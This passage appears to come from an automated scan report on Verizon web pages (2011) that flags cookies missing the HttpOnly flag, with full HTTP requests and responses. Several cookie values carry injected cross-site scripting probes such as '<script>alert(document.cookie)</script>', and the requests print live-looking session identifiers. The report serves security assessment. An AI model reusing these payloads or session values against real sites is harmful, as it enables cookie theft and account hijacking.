User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 366
Cache-Control: private, max-age=1666
Date: Mon, 05 Sep 2011 22:19:23 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:24:23 GMT; path=/content/; domain=verizon.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<title>Check Availability</title>

</head>
<body >

<iframe src
...[SNIP]...

10.126. http://www22.verizon.com/content/verizonglobalhome/setValues.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/content/verizonglobalhome/setValues.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ak-sf=false; expires=Mon, 05-Sep-2011 22:21:57 GMT; path=/content/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /content/verizonglobalhome/setValues.aspx?getVal1=1 HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/?lid=//global//residential
Content-Length: 0
Origin: http://www22.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; hbxRet=Y; V347=0; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; CP=null*; refURL=http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 72
Date: Mon, 05 Sep 2011 22:16:57 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:21:57 GMT; path=/content/; domain=verizon.com

hsi,High Speed Internet Without Phone,39.99*/?lid=//global//residential^

10.127. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/globalalert.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/onecms/vzcareers/ak-cached/4h/includes/javascript/globalalert.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

dtCookie=8C98328CB529EE605B41B254E42B3E4A; Path=/; Domain=.verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onecms/vzcareers/ak-cached/4h/includes/javascript/globalalert.js HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/jobs/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 10 Jun 2011 06:12:44 GMT
ETag: "122432c-740-4a55575437140:dtagent326GVC7"
Accept-Ranges: bytes
Content-Length: 1856
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: application/x-javascript
Cache-Control: public, max-age=14400
Date: Mon, 05 Sep 2011 22:18:40 GMT
Connection: close
Set-Cookie: dtCookie=8C98328CB529EE605B41B254E42B3E4A; Path=/; Domain=.verizon.com
Set-Cookie: NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660;path=/;httponly

/* ---------------------------------------------------------------------------------------------------------
Verizon Services Operations IT - Creative Development
Leads:
Lolly Chessie (lolly.che
...[SNIP]...

10.128. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/interactivemaps-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/onecms/vzcareers/ak-cached/4h/includes/javascript/interactivemaps-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

dtCookie=F0B2C87868F87FC6A655B69C67AB426A; Path=/; Domain=.verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onecms/vzcareers/ak-cached/4h/includes/javascript/interactivemaps-min.js HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/jobs/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sun, 19 Jun 2011 05:45:55 GMT
ETag: "2dc2b4-4910-4a60a21ee6d00:dtagent326GVC7"
Accept-Ranges: bytes
Content-Length: 18704
Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: application/x-javascript
Cache-Control: public, max-age=14400
Date: Mon, 05 Sep 2011 22:18:40 GMT
Connection: close
Set-Cookie: dtCookie=F0B2C87868F87FC6A655B69C67AB426A; Path=/; Domain=.verizon.com
Set-Cookie: NSC_xxx22_pofdnt_mcw=ffffffff895bfeca45525d5f4f58455e445a4a423660;path=/;httponly

var geocoder="";var map;var markersArray=[];var redmarkers=[];var prevElement="";var markerElement="";var directionsDisplay;var directionsService="";var busUnit="";var busunit="";var resultsStart=0;va
...[SNIP]...

10.129. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.autocomplete.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.autocomplete.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

dtCookie=EE5AD3E136DED5D5213A809D2C43BE81; Path=/; Domain=.verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.autocomplete.js HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/jobs/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 19 May 2011 00:35:03 GMT
ETag: "12242dc-3648-4a3962d1ade00:dtagent326GVC7"
Accept-Ranges: bytes
Content-Length: 13896
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: application/x-javascript
Cache-Control: public, max-age=14400
Date: Mon, 05 Sep 2011 22:18:40 GMT
Connection: close
Set-Cookie: dtCookie=EE5AD3E136DED5D5213A809D2C43BE81; Path=/; Domain=.verizon.com
Set-Cookie: NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660;path=/;httponly

jQuery.autocomplete = function(input, options) {
   // Create a link to self
   var me = this;

   // Create jQuery object for input element
   var $input = $(input).attr("autocomplete", "off");

   // A
...[SNIP]...

10.130. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.fancybox-1.3.4.pack_blkbg.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.fancybox-1.3.4.pack_blkbg.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

dtCookie=AD6328FE536A22C20265D4EAF77869AB; Path=/; Domain=.verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.fancybox-1.3.4.pack_blkbg.js HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/jobs/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 19 May 2011 00:35:03 GMT
ETag: "2dc2c1-3d64-4a3962d1ade00:dtagent326GVC7"
Accept-Ranges: bytes
Content-Length: 15716
Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: application/x-javascript
Cache-Control: public, max-age=14400
Date: Mon, 05 Sep 2011 22:18:40 GMT
Connection: close
Set-Cookie: dtCookie=AD6328FE536A22C20265D4EAF77869AB; Path=/; Domain=.verizon.com
Set-Cookie: NSC_xxx22_pofdnt_mcw=ffffffff895bfeca45525d5f4f58455e445a4a423660;path=/;httponly

/*
* FancyBox - jQuery Plugin
* Simple and fancy lightbox alternative
*
* Examples and documentation at: http://fancybox.net
*
* Copyright (c) 2008 - 2010 Janis Skarnelis
* That said, i
...[SNIP]...

10.131. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/resizeFlashContent.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/onecms/vzcareers/ak-cached/4h/includes/javascript/resizeFlashContent.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

dtCookie=2A590482738580C9C42A61F79126E809; Path=/; Domain=.verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onecms/vzcareers/ak-cached/4h/includes/javascript/resizeFlashContent.js HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/jobs/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 24 May 2011 07:49:04 GMT
ETag: "2dc2e6-3bb-4a400d279de40:dtagent326GVC7"
Accept-Ranges: bytes
Content-Length: 955
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: application/x-javascript
Cache-Control: public, max-age=14400
Date: Mon, 05 Sep 2011 22:18:40 GMT
Connection: close
Set-Cookie: dtCookie=2A590482738580C9C42A61F79126E809; Path=/; Domain=.verizon.com
Set-Cookie: NSC_xxx22_pofdnt_mcw=ffffffff895bfeca45525d5f4f58455e445a4a423660;path=/;httponly

// t: current time, b: begInnIng value, c: change In value, d: duration
jQuery.easing['jswing'] = jQuery.easing['swing'];

jQuery.extend( jQuery.easing,
{
def: 'easeInOutQuart',
swing: function (x,
...[SNIP]...

10.132. http://www22.verizon.com/onecms/vzcareers/includes/javascript/oo_engine.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/onecms/vzcareers/includes/javascript/oo_engine.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

dtCookie=A528D23E157B5DAF5094EF7EAA13842D; Path=/; Domain=.verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onecms/vzcareers/includes/javascript/oo_engine.js HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/jobs/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 21 Apr 2011 00:33:39 GMT
ETag: "50034e-73e-4a162e48aa100:dtagent326GVC7"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 1854
Cneonction: close
Content-Type: application/x-javascript
Expires: Mon, 05 Sep 2011 22:18:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:18:40 GMT
Connection: close
Set-Cookie: dtCookie=A528D23E157B5DAF5094EF7EAA13842D; Path=/; Domain=.verizon.com
Set-Cookie: NSC_xxx22_pofdnt_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660;path=/;httponly

/* OnlineOpinion (S3tS,1424b) */
/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */
var custom_var,_
...[SNIP]...

10.133. http://www22.verizon.com/residentialhelp/fiostv previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residentialhelp/fiostv

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; expires=Wed, 05-Sep-2012 22:24:31 GMT; path=/
ContextInfo_TV=FiOSTV; expires=Wed, 05-Sep-2012 22:24:31 GMT; path=/
ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; expires=Wed, 05-Sep-2012 22:24:31 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 239405
Expires: Mon, 05 Sep 2011 22:24:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:31 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; expires=Wed, 05-Sep-2012 22:24:31 GMT; path=/
Set-Cookie: ContextInfo_TV=FiOSTV; expires=Wed, 05-Sep-2012 22:24:31 GMT; path=/
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; expires=Wed, 05-Sep-2012 22:24:31 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML xmlns:vz>
<HEAD id="ctl00_head"><title>
Verizon | FiOS TV
</title><meta http-equiv="Content-Type" content="text/html;
...[SNIP]...

10.134. http://www22.verizon.com/residentialhelp/inhomeagent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residentialhelp/inhomeagent

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ECSPCookies=Partner=VZO&SolutionCenter=InHomeAgent&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>prompt("StoredXSS")</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:37:25 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /residentialhelp/inhomeagent HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.135. http://www22.verizon.com/residentialhelp/inhomeagent/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residentialhelp/inhomeagent/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ECSPCookies=Partner=VZO&SolutionCenter=InHomeAgent&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>prompt("StoredXSS")</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:37:25 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /residentialhelp/inhomeagent/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.136. http://www22.verizon.com/residentialhelp/phone previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residentialhelp/phone

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:39:57 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /residentialhelp/phone HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: autosuggest=on; AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; CMS_TimeZoneOffset=300; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; 